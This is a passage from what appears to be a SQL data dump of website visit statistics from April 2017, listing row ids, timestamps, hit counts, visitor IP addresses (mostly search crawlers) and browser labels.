,0,0,'164.132.161.9','other'),(103742,1493148015,1,0,1,0,'66.249.66.81',''),(103743,1493148337,2,2,0,0,'51.255.65.55','other'),(103744,1493148473,1,1,0,0,'180.76.15.134','other'),(103745,1493148528,1,1,0,0,'216.244.66.246','other'),(103746,1493148560,1,1,0,0,'51.255.71.130','other'),(103747,1493148695,1,1,0,0,'8.29.198.27','other'),(103748,1493148995,1,1,0,0,'164.132.161.34','other'),(103749,1493149132,1,1,0,0,'51.255.65.74','other'),(103750,1493149194,1,1,0,0,'164.132.161.48','other'),(103751,1493149228,2,2,0,0,'216.244.66.237','other'),(103752,1493149961,1,1,0,0,'217.182.132.77','other'),(103753,1493150322,1,1,0,0,'217.182.132.20','other'),(103754,1493150431,1,1,0,0,'164.132.161.28','other'),(103755,1493150559,1,1,0,0,'164.132.161.54','other'),(103756,1493150999,1,1,0,0,'217.182.132.86','other'),(103757,1493151042,1,1,0,0,'51.255.71.113','other'),(103758,1493152368,1,1,0,0,'51.255.65.87','other'),(103759,1493152637,1,0,1,0,'66.249.76.67',''),(103760,1493153110,1,1,0,0,'164.132.161.47','other'),(103761,1493154379,1,1,0,0,'51.255.65.52','other'),(103762,1493154380,1,1,0,0,'217.69.133.28','other'),(103763,1493155600,1,0,1,0,'207.46.13.125',''),(103764,1493155796,1,1,0,0,'217.182.132.186','other'),(103765,1493155829,1,1,0,0,'164.132.161.34','other'),(103766,1493156112,1,0,1,0,'66.249.76.71',''),(103767,1493156219,1,1,0,0,'91.209.11.236','other'),(103768,1493156340,1,1,0,0,'217.69.133.248','other'),(103769,1493156345,1,0,1,0,'66.249.76.73',''),(103770,1493156825,1,1,0,0,'217.182.132.33','other'),(103771,1493156865,3,3,0,0,'216.244.66.246','other'),(103772,1493158053,1,1,0,0,'217.69.133.223','other'),(103773,1493158153,1,1,0,0,'51.255.65.53','other'),(103774,1493158236,1,1,0,0,'51.255.65.91','other'),(103775,1493158555,1,1,0,0,'51.255.65.68','other'),(103776,1493158903,1,1,0,0,'93.75.213.121','other'),(103777,1493158971,1,1,0,0,'51.255.65.9','other'),(103778,1493159183,1,1,0,0,'51.255.65.38','other'),(103779,1493159286,1,1,0,0,'217.69.133.226','other'),(103780,1493159526,1,1,0,0,'8.29.198.25','other'),(103781,1493159685,1,0,1,0,'66.249.76.71',''),(103782,1493159885,1,1,0,0,'164.132.161.80','other'),(103783,1493160858,1,1,0,0,'40.77.167.58','other'),(103784,1493161143,1,1,0,0,'51.255.71.117','other'),(103785,1493161347,1,1,0,0,'51.255.65.58','other'),(103786,1493161575,1,1,0,0,'217.182.132.64','other'),(103787,1493161713,1,0,1,0,'66.249.66.87',''),(103788,1493162332,1,1,0,0,'164.132.161.77','other'),(103789,1493162630,1,1,0,0,'217.182.132.190','other'),(103790,1493163028,1,1,0,0,'137.74.207.170','other'),(103791,1493163444,1,1,0,0,'217.182.132.51','other'),(103792,1493163570,1,0,1,0,'66.249.76.71',''),(103793,1493164358,1,1,0,0,'164.132.161.62','other'),(103794,1493164922,1,0,1,0,'66.249.76.67',''),(103795,1493164952,2,2,0,0,'216.244.66.246','other'),(103796,1493164955,1,1,0,0,'164.132.161.54','other'),(103797,1493165285,1,1,0,0,'51.255.65.72','other'),(103798,1493165310,1,1,0,0,'40.77.167.58','other'),(103799,1493166775,1,1,0,0,'217.182.132.79','other'),(103800,1493167114,1,1,0,0,'217.69.133.60','other'),(103801,1493167359,1,1,0,0,'217.182.132.64','other'),(103802,1493167546,1,1,0,0,'51.255.65.75','other'),(103803,1493167622,1,1,0,0,'180.76.15.147','other'),(103804,1493167656,1,1,0,0,'51.255.65.59','other'),(103805,1493167664,1,1,0,0,'51.255.65.39','other'),(103806,1493168440,2,2,0,0,'216.244.66.246','other'),(103807,1493168455,1,1,0,0,'164.132.162.164','other'),(103808,1493169298,1,1,0,0,'217.182.132.65','other'),(103809,1493169471,1,1,0,0,'217.69.136.203','other'),(103810,1493169793,1,1,0,0,'164.132.161.19','other'),(103811,1493170052,1,1,0,0,'217.182.132.16','other'),(103812,1493170083,1,1,0,0,'164.132.161.28','other'),(103813,1493170212,2,2,0,0,'217.69.133.227','other'),(103814,1493170244,2,2,0,0,'164.132.161.90','other'),(103815,1493170360,1,1,0,0,'8.29.198.26','other'),(103816,1493170511,1,1,0,0,'51.255.65.78','other'),(103817,1493170547,1,1,0,0,'51.255.71.101','other'),(103818,1493170974,1,1,0,0,'137.74.207.159','other'),(103819,1493170997,1,0,1,0,'66.249.76.67',''),(103820,1493171738,1,1,0,0,'164.132.161.56','other'),(103821,1493171853,1,0,1,0,'66.249.66.87',''),(103822,1493172022,1,1,0,0,'217.182.132.62','other'),(103823,1493172267,1,1,0,0,'217.182.132.154','other'),(103824,1493172943,1,0,1,0,'66.249.76.45',''),(103825,1493173816,1,1,0,0,'164.132.161.48','other'),(103826,1493174149,1,0,1,0,'66.249.66.180',''),(103827,1493174782,1,1,0,0,'216.244.66.246','other'),(103828,1493174808,1,1,0,0,'217.69.133.227','other'),(103829,1493174970,1,1,0,0,'217.69.133.2','other'),(103830,1493175262,1,1,0,0,'137.74.207.161','other'),(103831,1493175706,1,1,0,0,'164.132.161.61','other'),(103832,1493175733,1,1,0,0,'164.132.161.31','other'),(103833,1493175938,1,1,0,0,'217.182.132.20','other'),(103834,1493176443,1,1,0,0,'216.244.66.246','other'),(103835,1493176655,1,1,0,0,'217.69.133.193','other'),(103836,1493176809,1,0,1,0,'66.249.76.67',''),(103837,1493176964,1,1,0,0,'217.182.132.7','other'),(103838,1493177099,1,1,0,0,'164.132.161.7','other'),(103839,1493177394,1,1,0,0,'216.244.66.237','other'),(103840,1493177443,1,1,0,0,'164.132.161.4','other'),(103841,1493178645,1,1,0,0,'217.182.132.87','other'),(103842,1493178857,1,1,0,0,'216.244.66.246','other'),(103843,1493178867,1,1,0,0,'31.131.105.1','chrome'),(103844,1493179561,1,0,1,0,'66.249.76.73',''),(103845,1493179979,1,1,0,0,'51.255.65.13','other'),(103846,1493180004,1,1,0,0,'217.69.133.190','other'),(103847,1493180449,1,0,1,0,'207.46.13.138',''),(103848,1493180552,1,1,0,0,'51.255.65.65','other'),(103849,1493180895,1,1,0,0,'216.244.66.246','other'),(103850,1493180964,1,1,0,0,'216.244.66.237','other'),(103851,1493181196,1,1,0,0,'8.29.198.27','other'),(103852,1493181495,1,1,0,0,'51.255.65.82','other'),(103853,1493181607,1,1,0,0,'91.196.178.68','firefox'),(103854,1493182039,1,1,0,0,'178.255.215.94','other'),(103855,1493182065,1,1,0,0,'216.244.66.246','other'),(103856,1493182348,1,1,0,0,'217.182.132.188','other'),(103857,1493182359,1,1,0,0,'54.165.59.7','other'),(103858,1493182509,1,1,0,0,'217.182.132.241','other'),(103859,1493182560,1,1,0,0,'164.132.161.87','other'),(103860,1493182646,1,1,0,0,'164.132.161.88','other'),(103861,1493182930,1,1,0,0,'216.244.66.237','other'),(103862,1493183411,1,0,1,0,'66.249.76.47',''),(103863,1493183696,1,0,1,0,'66.249.76.45',''),(103864,1493183731,1,1,0,0,'91.196.178.68','firefox'),(103865,1493183791,1,1,0,0,'51.255.65.14','other'),(103866,1493183804,1,1,0,0,'164.132.162.153','other'),(103867,1493184427,1,1,0,0,'217.182.132.76','other'),(103868,1493184519,1,1,0,0,'91.196.178.68','chrome'),(103869,1493184679,45,45,0,0,'208.43.225.85','other'),(103870,1493184797,1,1,0,0,'217.182.132.68','other'),(103871,1493184899,19,19,0,0,'208.43.225.84','other'),(103872,1493185368,1,1,0,0,'164.132.161.6','other'),(103873,1493185395,2,0,2,0,'66.249.76.73',''),(103874,1493185676,1,0,1,0,'66.249.76.45',''),(103875,1493185727,1,1,0,0,'164.132.161.19','other'),(103876,1493185738,1,1,0,0,'66.249.66.95','chrome'),(103877,1493185772,1,1,0,0,'51.255.71.100','other'),(103878,1493185908,2,2,0,0,'54.165.59.7','other'),(103879,1493186145,3,3,0,0,'91.196.178.68','chrome'),(103880,1493186201,1,0,1,0,'66.249.76.46',''),(103881,1493186741,47,47,0,0,'192.99.66.150','chrome'),(103882,1493186795,1,1,0,0,'78.111.185.58','firefox'),(103883,1493187022,1,0,1,0,'66.249.76.73',''),(103884,1493187046,1,1,0,0,'91.196.178.68','chrome'),(103885,1493187110,2,2,0,0,'91.196.178.68','firefox'),(103886,1493187140,1,1,0,0,'92.112.26.89','chrome'),(103887,1493187606,1,1,0,0,'54.165.59.7','other'),(103888,1493187662,1,1,0,0,'5.255.253.31','other'),(103889,1493187666,1,1,0,0,'141.8.132.25','other'),(103890,1493187916,1,1,0,0,'164.132.161.33','other'),(103891,1493187924,1,1,0,0,'51.255.65.36','other'),(103892,1493188126,3,3,0,0,'216.244.66.246','other'),(103893,1493188216,1,1,0,0,'130.180.217.232','chrome'),(103894,1493188403,1,1,0,0,'217.182.132.156','other'),(103895,1493188443,1,1,0,0,'217.69.133.244','other'),(103896,1493188488,3,3,0,0,'91.196.178.68','firefox'),(103897,1493189417,1,1,0,0,'91.196.178.166','chrome'),(103898,1493189640,1,1,0,0,'91.196.178.68','firefox'),(103899,1493189795,2,2,0,0,'176.36.60.115','chrome'),(103900,1493190129,2,2,0,0,'23.101.61.176','other'),(103901,1493190131,1,1,0,0,'91.196.178.168','firefox'),(103902,1493190807,1,1,0,0,'91.196.178.68','firefox'),(103903,1493190821,1,0,1,0,'66.249.76.71',''),(103904,1493191374,1,1,0,0,'91.196.178.168','firefox'),(103905,1493191421,1,1,0,0,'91.196.178.168','chrome'),(103906,1493191639,1,0,1,0,'66.249.66.177',''),(103907,1493191799,1,1,0,0,'91.196.178.68','firefox'),(103908,1493191869,2,2,0,0,'91.196.178.68','chrome'),(103909,1493192007,1,1,0,0,'66.249.66.183','chrome'),(103910,1493192024,1,1,0,0,'8.29.198.26','other'),(103911,1493192042,1,1,0,0,'91.196.177.26','chrome'),(103912,1493192740,1,0,1,0,'207.46.13.184',''),(103913,1493192818,1,1,0,0,'217.182.132.55','other'),(103914,1493192838,1,1,0,0,'130.180.212.199','opera'),(103915,1493193146,2,2,0,0,'91.196.178.68','chrome'),(103916,1493193497,1,1,0,0,'93.74.212.147','firefox'),(103917,1493193841,1,1,0,0,'91.196.178.129','firefox'),(103918,1493194358,1,1,0,0,'91.196.178.70','firefox'),(103919,1493194815,2,2,0,0,'216.244.66.237','other'),(103920,1493194947,1,1,0,0,'164.132.161.40','other'),(103921,1493195008,1,1,0,0,'164.132.162.187','other'),(103922,1493195651,1,1,0,0,'51.255.65.6','other'),(103923,1493195676,1,1,0,0,'213.108.45.138','firefox'),(103924,1493195770,1,1,0,0,'217.182.132.152','other'),(103925,1493195793,1,0,1,0,'66.249.76.47',''),(103926,1493196183,1,1,0,0,'91.196.178.68','chrome'),(103927,1493196333,1,0,1,0,'207.46.13.138',''),(103928,1493197368,1,1,0,0,'51.255.65.48','other'),(103929,1493197644,1,1,0,0,'37.53.71.66','chrome'),(103930,1493198070,1,1,0,0,'51.255.65.17','other'),(103931,1493198172,1,1,0,0,'51.255.65.83','other'),(103932,1493198339,2,2,0,0,'216.244.66.246','other'),(103933,1493198343,1,1,0,0,'51.255.65.38','other'),(103934,1493198826,1,1,0,0,'217.69.133.2','other'),(103935,1493199166,1,1,0,0,'164.132.161.87','other'),(103936,1493199430,1,1,0,0,'217.182.132.58','other'),(103937,1493199748,1,1,0,0,'91.196.178.168','firefox'),(103938,1493199863,1,1,0,0,'66.249.93.14','chrome'),(103939,1493200165,2,2,0,0,'66.249.76.71','chrome'),(103940,1493200321,1,1,0,0,'91.196.177.15','chrome'),(103941,1493200526,1,1,0,0,'91.209.11.236','other'),(103942,1493200666,1,1,0,0,'91.196.178.70','firefox'),(103943,1493200709,1,1,0,0,'37.140.189.196','chrome'),(103944,1493200803,1,1,0,0,'31.154.81.58','chrome'),(103945,1493200892,1,1,0,0,'217.69.133.190','other'),(103946,1493200908,1,1,0,0,'164.132.161.61','other'),(103947,1493201233,1,0,1,0,'66.249.76.71',''),(103948,1493201856,1,1,0,0,'91.196.178.65','firefox'),(103949,1493201858,1,1,0,0,'51.255.71.122','other'),(103950,1493202106,1,1,0,0,'51.255.65.18','other'),(103951,1493202857,1,1,0,0,'8.29.198.25','other'),(103952,1493203271,1,1,0,0,'137.74.207.159','other'),(103953,1493203307,1,1,0,0,'217.182.132.27','other'),(103954,1493204889,1,1,0,0,'217.182.132.54','other'),(103955,1493205220,1,1,0,0,'51.255.65.25','other'),(103956,1493205249,1,1,0,0,'37.52.19.158','firefox'),(103957,1493205299,1,1,0,0,'51.255.65.47','other'),(103958,1493205543,1,1,0,0,'217.182.132.32','other'),(103959,1493205757,1,1,0,0,'51.255.65.58','other'),(103960,1493206060,1,1,0,0,'178.92.171.23','chrome'),(103961,1493206133,1,0,1,0,'66.249.66.180',''),(103962,1493206519,1,1,0,0,'217.69.133.253','other'),(103963,1493206799,1,1,0,0,'217.182.132.80','other'),(103964,1493207197,1,0,1,0,'66.249.76.46',''),(103965,1493207264,1,1,0,0,'164.132.161.55','other'),(103966,1493207703,1,1,0,0,'51.255.65.85','other'),(103967,1493208277,1,1,0,0,'91.196.178.66','firefox'),(103968,1493208790,1,1,0,0,'216.244.66.246','other'),(103969,1493209113,1,1,0,0,'51.255.71.115','other'),(103970,1493209255,1,1,0,0,'51.255.65.76','other'),(103971,1493210116,1,1,0,0,'164.132.161.35','other'),(103972,1493210174,1,1,0,0,'137.74.207.116','other'),(103973,1493210332,1,1,0,0,'91.196.177.46','chrome'),(103974,1493210772,1,0,1,0,'66.249.76.67',''),(103975,1493210800,1,0,1,0,'66.249.66.84',''),(103976,1493211002,1,1,0,0,'93.74.212.147','firefox'),(103977,1493211208,1,1,0,0,'51.255.65.72','other'),(103978,1493211349,1,0,1,0,'66.249.76.47',''),(103979,1493211509,1,1,0,0,'164.132.161.63','other'),(103980,1493211643,1,1,0,0,'217.182.132.51','other'),(103981,1493211768,1,1,0,0,'91.196.178.71','firefox'),(103982,1493211857,1,1,0,0,'137.74.201.100','other'),(103983,1493212270,1,1,0,0,'91.196.179.25','chrome'),(103984,1493212739,1,1,0,0,'164.132.161.76','other'),(103985,1493213048,1,0,1,0,'66.249.76.46',''),(103986,1493213188,1,0,1,0,'66.249.66.180',''),(103987,1493213523,1,1,0,0,'91.196.178.68','firefox'),(103988,1493213691,1,1,0,0,'8.29.198.25','other'),(103989,1493213842,1,1,0,0,'51.255.65.53','other'),(103990,1493214110,1,1,0,0,'37.52.21.52','firefox'),(103991,1493214678,1,1,0,0,'51.255.65.24','other'),(103992,1493214760,1,1,0,0,'91.196.178.70','firefox'),(103993,1493215936,1,1,0,0,'51.255.65.56','other'),(103994,1493216206,1,1,0,0,'217.182.132.241','other'),(103995,1493216329,1,1,0,0,'217.182.132.31','other'),(103996,1493216437,1,1,0,0,'164.132.161.93','other'),(103997,1493216575,1,1,0,0,'164.132.161.87','other'),(103998,1493216635,1,1,0,0,'46.164.155.50','chrome'),(103999,1493217180,1,1,0,0,'51.255.65.31','other'),(104000,1493217305,1,1,0,0,'164.132.161.48','other'),(104001,1493217393,2,2,0,0,'91.196.178.72','firefox'),(104002,1493218369,1,1,0,0,'37.52.20.165','chrome'),(104003,1493218654,1,1,0,0,'217.182.132.146','other'),(104004,1493218699,1,1,0,0,'164.132.161.28','other'),(104005,1493218767,1,1,0,0,'51.255.65.54','other'),(104006,1493218839,1,1,0,0,'180.76.15.21','other'),(104007,1493219240,1,1,0,0,'217.69.133.221','other'),(104008,1493219402,1,1,0,0,'217.182.132.59','other'),(104009,1493219408,1,1,0,0,'216.244.66.246','other'),(104010,1493220068,1,1,0,0,'46.188.61.118','chrome'),(104011,1493220319,1,1,0,0,'51.255.71.132','other'),(104012,1493221869,1,1,0,0,'164.132.161.62','other'),(104013,1493221912,1,0,1,0,'66.249.76.46',''),(104014,1493221961,1,1,0,0,'51.255.65.58','other'),(104015,1493222016,1,1,0,0,'164.132.161.56','other'),(104016,1493222255,1,0,1,0,'66.249.76.45',''),(104017,1493222275,1,1,0,0,'217.182.132.151','other'),(104018,1493222287,1,1,0,0,'51.255.65.60','other'),(104019,1493222592,1,1,0,0,'66.249.93.72','chrome'),(104020,1493223465,1,1,0,0,'193.194.127.217','firefox'),(104021,1493223528,1,1,0,0,'40.77.167.58','other'),(104022,1493223562,1,1,0,0,'95.108.179.21','other'),(104023,1493224084,1,1,0,0,'217.182.132.155','other'),(104024,1493224525,1,1,0,0,'8.29.198.26','other'),(104025,1493224934,1,0,1,0,'66.249.76.73',''),(104026,1493225196,1,1,0,0,'82.145.221.233','other'),(104027,1493225749,1,1,0,0,'216.244.66.237','other'),(104028,1493225845,1,1,0,0,'217.182.132.16','other'),(104029,1493226114,1,1,0,0,'51.255.65.92','other'),(104030,1493226286,1,0,1,0,'66.249.66.84',''),(104031,1493226447,1,1,0,0,'51.255.65.8','other'),(104032,1493227309,1,0,1,0,'66.249.76.71',''),(104033,1493227485,1,0,1,0,'66.249.76.47',''),(104034,1493228384,1,1,0,0,'217.182.132.147','other'),(104035,1493228474,1,1,0,0,'51.255.71.101','other'),(104036,1493228600,1,0,1,0,'66.249.66.202',''),(104037,1493228731,1,1,0,0,'94.179.209.103','chrome'),(104038,1493228799,1,1,0,0,'91.196.178.40','chrome'),(104039,1493228981,1,0,1,0,'66.249.76.71',''),(104040,1493229046,1,0,1,0,'66.249.76.67',''),(104041,1493229051,1,1,0,0,'66.102.9.25','chrome'),(104042,1493229052,1,1,0,0,'66.102.9.29','chrome'),(104043,1493229200,4,4,0,0,'37.54.16.131','chrome'),(104044,1493229216,1,1,0,0,'217.182.132.96','other'),(104045,1493229228,2,2,0,0,'91.196.178.103','chrome'),(104046,1493229451,1,1,0,0,'216.244.66.246','other'),(104047,1493229577,1,1,0,0,'217.182.132.21','other'),(104048,1493230605,2,2,0,0,'216.244.66.246','other'),(104049,1493231073,1,1,0,0,'51.255.65.9','other'),(104050,1493231177,1,1,0,0,'217.182.132.177','other'),(104051,1493231355,1,1,0,0,'91.196.178.38','chrome'),(104052,1493231647,1,0,1,0,'66.249.76.71',''),(104053,1493231842,1,0,1,0,'66.249.76.73',''),(104054,1493232578,1,1,0,0,'51.255.65.80','other'),(104055,1493233262,1,1,0,0,'91.196.178.161','chrome'),(104056,1493233627,1,1,0,0,'217.182.132.78','other'),(104057,1493234169,1,1,0,0,'216.244.66.246','other'),(104058,1493234221,1,1,0,0,'51.255.65.23','other'),(104059,1493235045,1,1,0,0,'137.74.207.108','other'),(104060,1493235073,1,1,0,0,'91.196.178.166','chrome'),(104061,1493235356,1,1,0,0,'8.29.198.27','other'),(104062,1493235976,1,1,0,0,'164.132.161.70','other'),(104063,1493236039,1,1,0,0,'51.255.65.70','other'),(104064,1493236172,1,1,0,0,'164.132.161.38','other'),(104065,1493236446,1,1,0,0,'164.132.161.31','other'),(104066,1493236547,1,1,0,0,'46.219.233.169','chrome'),(104067,1493237298,1,1,0,0,'95.108.213.34','other'),(104068,1493237299,1,1,0,0,'141.8.142.15','other'),(104069,1493237753,1,1,0,0,'217.182.132.65','other'),(104070,1493238105,1,1,0,0,'137.74.207.164','other'),(104071,1493238439,1,1,0,0,'217.182.132.29','other'),(104072,1493238641,2,2,0,0,'216.244.66.237','other'),(104073,1493238870,1,1,0,0,'51.255.71.118','other'),(104074,1493239231,1,1,0,0,'51.255.65.39','other'),(104075,1493239470,1,1,0,0,'164.132.161.12','other'),(104076,1493239657,1,1,0,0,'137.74.207.164','other'),(104077,1493239689,1,1,0,0,'141.8.142.91','other'),(104078,1493240156,1,1,0,0,'66.249.66.87','chrome'),(104079,1493240236,1,1,0,0,'178.154.189.22','other'),(104080,1493240318,1,1,0,0,'51.255.71.118','other'),(104081,1493240436,1,1,0,0,'137.74.201.100','other'),(104082,1493240509,1,1,0,0,'216.244.66.237','other'),(104083,1493240599,1,1,0,0,'217.182.132.146','other'),(104084,1493240603,2,2,0,0,'217.182.132.55','other'),(104085,1493241308,1,1,0,0,'95.108.213.34','other'),(104086,1493241354,1,1,0,0,'137.74.207.159','other'),(104087,1493241451,2,2,0,0,'216.244.66.246','other'),(104088,1493241658,1,0,1,0,'66.249.76.67',''),(104089,1493241706,1,1,0,0,'164.132.161.9','other'),(104090,1493242441,1,1,0,0,'51.255.65.80','other'),(104091,1493242499,1,1,0,0,'137.74.207.110','other'),(104092,1493242618,1,1,0,0,'164.132.161.78','other'),(104093,1493242752,1,1,0,0,'216.244.66.246','other'),(104094,1493242896,1,1,0,0,'54.165.59.7','other'),(104095,1493243084,1,1,0,0,'37.9.113.38','other'),(104096,1493243612,1,1,0,0,'217.69.133.3','other'),(104097,1493243841,1,1,0,0,'51.255.65.2','other'),(104098,1493244036,1,1,0,0,'54.165.59.7','other'),(104099,1493244088,1,1,0,0,'217.182.132.178','other'),(104100,1493244114,1,1,0,0,'51.255.65.41','other'),(104101,1493244480,1,1,0,0,'217.182.132.27','other'),(104102,1493244723,1,1,0,0,'164.132.161.24','other'),(104103,1493245034,1,1,0,0,'51.255.65.50','other'),(104104,1493245264,1,1,0,0,'217.182.132.185','other'),(104105,1493245520,1,0,1,0,'66.249.76.45',''),(104106,1493245602,1,1,0,0,'95.28.181.205','msie'),(104107,1493245659,1,1,0,0,'217.69.133.251','other'),(104108,1493245683,1,1,0,0,'217.182.132.58','other'),(104109,1493246183,1,1,0,0,'8.29.198.26','other'),(104110,1493246581,1,0,1,0,'66.249.66.202',''),(104111,1493246648,1,1,0,0,'137.74.201.108','other'),(104112,1493247473,1,1,0,0,'164.132.161.86','other'),(104113,1493247748,1,1,0,0,'51.255.71.111','other'),(104114,1493248374,1,1,0,0,'217.182.132.34','other'),(104115,1493248836,1,1,0,0,'51.255.65.74','other'),(104116,1493248867,1,0,1,0,'66.249.76.73',''),(104117,1493249227,1,1,0,0,'151.80.27.116','other'),(104118,1493249510,1,1,0,0,'217.182.132.191','other'),(104119,1493249788,1,1,0,0,'180.76.15.152','other'),(104120,1493249902,1,1,0,0,'51.255.65.78','other'),(104121,1493249932,1,1,0,0,'216.244.66.246','other'),(104122,1493250162,1,1,0,0,'216.244.66.237','other'),(104123,1493250180,1,1,0,0,'157.55.39.94','other'),(104124,1493250566,1,1,0,0,'164.132.161.8','other'),(104125,1493251105,1,0,1,0,'66.249.66.81',''),(104126,1493251254,1,1,0,0,'217.182.132.240','other'),(104127,1493251291,1,1,0,0,'217.182.132.15','other'),(104128,1493251312,1,1,0,0,'164.132.161.6','other'),(104129,1493251321,1,1,0,0,'51.255.65.24','other'),(104130,1493252201,1,1,0,0,'216.244.66.237','other'),(104131,1493252844,1,1,0,0,'66.249.76.47','chrome'),(104132,1493254025,1,1,0,0,'51.255.65.51','other'),(104133,1493254370,1,1,0,0,'217.182.132.191','other'),(104134,1493254510,1,1,0,0,'217.182.132.88','other'),(104135,1493255003,1,1,0,0,'51.255.71.133','other'),(104136,1493255216,1,1,0,0,'40.77.167.107','other'),(104137,1493255365,1,1,0,0,'137.74.207.164','other'),(104138,1493255480,1,1,0,0,'51.255.65.11','other'),(104139,1493255601,1,1,0,0,'216.244.66.246','other'),(104140,1493256418,1,0,1,0,'66.249.66.81',''),(104141,1493256661,1,1,0,0,'66.249.76.45','chrome'),(104142,1493256755,1,1,0,0,'66.249.66.202','chrome'),(104143,1493257016,1,1,0,0,'8.29.198.27','other'),(104144,1493257872,1,1,0,0,'51.255.65.27','other'),(104145,1493257884,1,1,0,0,'51.255.65.31','other'),(104146,1493258184,1,1,0,0,'51.255.65.26','other'),(104147,1493258400,1,1,0,0,'217.182.132.57','other'),(104148,1493258994,1,1,0,0,'217.182.132.58','other'),(104149,1493259082,1,0,1,0,'66.249.76.73',''),(104150,1493259444,3,3,0,0,'216.244.66.237','other'),(104151,1493259987,1,1,0,0,'51.255.71.112','other'),(104152,1493260335,1,1,0,0,'164.132.162.164','other'),(104153,1493261216,1,1,0,0,'51.255.65.70','other'),(104154,1493261837,1,1,0,0,'51.255.65.34','other'),(104155,1493262048,2,2,0,0,'216.244.66.246','other'),(104156,1493262165,1,1,0,0,'164.132.161.57','other'),(104157,1493262203,1,1,0,0,'157.55.39.94','other'),(104158,1493262226,1,1,0,0,'217.182.132.24','other'),(104159,1493262267,1,1,0,0,'51.255.65.97','other'),(104160,1493262757,1,1,0,0,'217.182.132.51','other'),(104161,1493263532,1,0,1,0,'66.249.76.46',''),(104162,1493263577,1,1,0,0,'164.132.161.19','other'),(104163,1493263661,1,1,0,0,'66.249.76.47','chrome'),(104164,1493263750,1,1,0,0,'216.244.66.237','other'),(104165,1493265331,1,1,0,0,'66.249.66.84','chrome'),(104166,1493265606,1,1,0,0,'217.182.132.147','other'),(104167,1493265731,1,1,0,0,'51.255.65.93','other'),(104168,1493266505,1,1,0,0,'217.69.133.29','other'),(104169,1493266688,1,1,0,0,'51.255.65.52','other'),(104170,1493267189,1,1,0,0,'66.249.76.73','chrome'),(104171,1493267279,1,1,0,0,'216.244.66.237','other'),(104172,1493267815,1,1,0,0,'164.132.161.57','other'),(104173,1493267844,1,1,0,0,'8.29.198.25','other'),(104174,1493268048,1,1,0,0,'91.196.178.67','firefox'),(104175,1493268645,1,1,0,0,'157.55.39.169','other'),(104176,1493269150,1,1,0,0,'164.132.161.16','other'),(104177,1493269180,1,1,0,0,'217.182.132.79','other'),(104178,1493269235,1,1,0,0,'51.255.71.130','other'),(104179,1493269395,1,1,0,0,'178.93.245.145','chrome'),(104180,1493269409,1,1,0,0,'217.182.132.29','other'),(104181,1493269814,1,1,0,0,'91.196.178.71','firefox'),(104182,1493269918,1,0,1,0,'66.249.66.202',''),(104183,1493270016,2,0,2,0,'66.249.76.46',''),(104184,1493270436,1,0,1,0,'66.249.76.67',''),(104185,1493270477,1,1,0,0,'164.132.161.61','other'),(104186,1493270774,1,0,1,0,'66.249.76.45',''),(104187,1493271449,1,1,0,0,'66.249.76.46','chrome'),(104188,1493271491,1,1,0,0,'51.255.71.113','other'),(104189,1493272162,2,0,2,0,'66.249.76.47',''),(104190,1493272570,1,1,0,0,'51.255.65.95','other'),(104191,1493273212,1,1,0,0,'51.255.65.224','other'),(104192,1493273700,1,1,0,0,'164.132.161.17','other'),(104193,1493274011,1,1,0,0,'217.182.132.157','other'),(104194,1493274202,1,1,0,0,'91.196.178.68','chrome'),(104195,1493274870,1,1,0,0,'176.195.250.212','msie'),(104196,1493275669,1,1,0,0,'180.76.15.5','other'),(104197,1493275806,1,1,0,0,'216.244.66.246','other'),(104198,1493276116,1,1,0,0,'91.196.178.71','chrome'),(104199,1493276258,1,1,0,0,'95.132.1.218','firefox'),(104200,1493276351,1,1,0,0,'91.196.178.71','firefox'),(104201,1493277157,1,1,0,0,'91.196.178.71','chrome'),(104202,1493277360,1,1,0,0,'51.255.65.81','other'),(104203,1493277834,1,1,0,0,'91.196.177.46','chrome'),(104204,1493277924,1,1,0,0,'164.132.161.81','other'),(104205,1493278211,1,1,0,0,'164.132.161.22','other'),(104206,1493278223,1,1,0,0,'217.182.132.188','other'),(104207,1493278671,1,1,0,0,'8.29.198.27','other'),(104208,1493279152,1,1,0,0,'66.249.66.84','chrome'),(104209,1493279378,1,1,0,0,'66.249.76.71','chrome'),(104210,1493279556,1,1,0,0,'164.132.161.60','other'),(104211,1493279604,1,1,0,0,'95.132.1.218','firefox'),(104212,1493279657,1,1,0,0,'217.182.132.174','other'),(104213,1493279743,1,1,0,0,'217.182.132.57','other'),(104214,1493279815,1,1,0,0,'164.132.162.156','other'),(104215,1493280298,1,1,0,0,'164.132.161.6','other'),(104216,1493280616,1,1,0,0,'91.196.178.66','chrome'),(104217,1493280672,1,1,0,0,'66.249.76.45','chrome'),(104218,1493280858,1,1,0,0,'91.196.178.71','firefox'),(104219,1493281355,1,1,0,0,'91.196.178.68','other'),(104220,1493281551,1,1,0,0,'164.132.161.58','other'),(104221,1493281624,1,1,0,0,'46.211.120.130','chrome'),(104222,1493281909,1,1,0,0,'164.132.161.9','other'),(104223,1493282248,1,1,0,0,'164.132.162.154','other'),(104224,1493282335,1,0,1,0,'66.249.66.87',''),(104225,1493282478,1,0,1,0,'66.249.76.73',''),(104226,1493282947,1,1,0,0,'91.196.178.68','firefox'),(104227,1493283346,1,1,0,0,'51.255.71.121','other'),(104228,1493283364,1,1,0,0,'91.196.178.71','firefox'),(104229,1493283515,1,1,0,0,'91.196.178.68','chrome'),(104230,1493283718,1,1,0,0,'91.196.178.132','firefox'),(104231,1493283999,1,1,0,0,'217.182.132.57','other'),(104232,1493285727,1,1,0,0,'164.132.161.85','other'),(104233,1493285824,1,1,0,0,'51.255.65.56','other'),(104234,1493287420,1,1,0,0,'217.182.132.151','other'),(104235,1493287442,1,1,0,0,'37.53.229.237','chrome'),(104236,1493287785,1,1,0,0,'91.196.178.68','firefox'),(104237,1493287795,1,1,0,0,'46.219.33.172','firefox'),(104238,1493287837,1,1,0,0,'130.180.217.240','firefox'),(104239,1493287997,1,1,0,0,'195.49.151.89','chrome'),(104240,1493288125,1,1,0,0,'78.46.201.253','firefox'),(104241,1493288413,1,1,0,0,'164.132.161.13','other'),(104242,1493288469,1,1,0,0,'51.255.65.93','other'),(104243,1493288567,1,1,0,0,'51.255.71.117','other'),(104244,1493289495,1,1,0,0,'8.29.198.26','other'),(104245,1493289608,2,2,0,0,'216.244.66.237','other'),(104246,1493289706,1,1,0,0,'66.249.93.14','chrome'),(104247,1493290219,1,0,1,0,'66.249.66.81',''),(104248,1493290222,1,1,0,0,'51.255.71.123','other'),(104249,1493290348,1,1,0,0,'91.196.178.167','chrome'),(104250,1493290644,1,1,0,0,'37.52.83.43','chrome'),(104251,1493290696,1,1,0,0,'95.108.213.34','other'),(104252,1493290826,1,1,0,0,'164.132.161.36','other'),(104253,1493290839,1,1,0,0,'1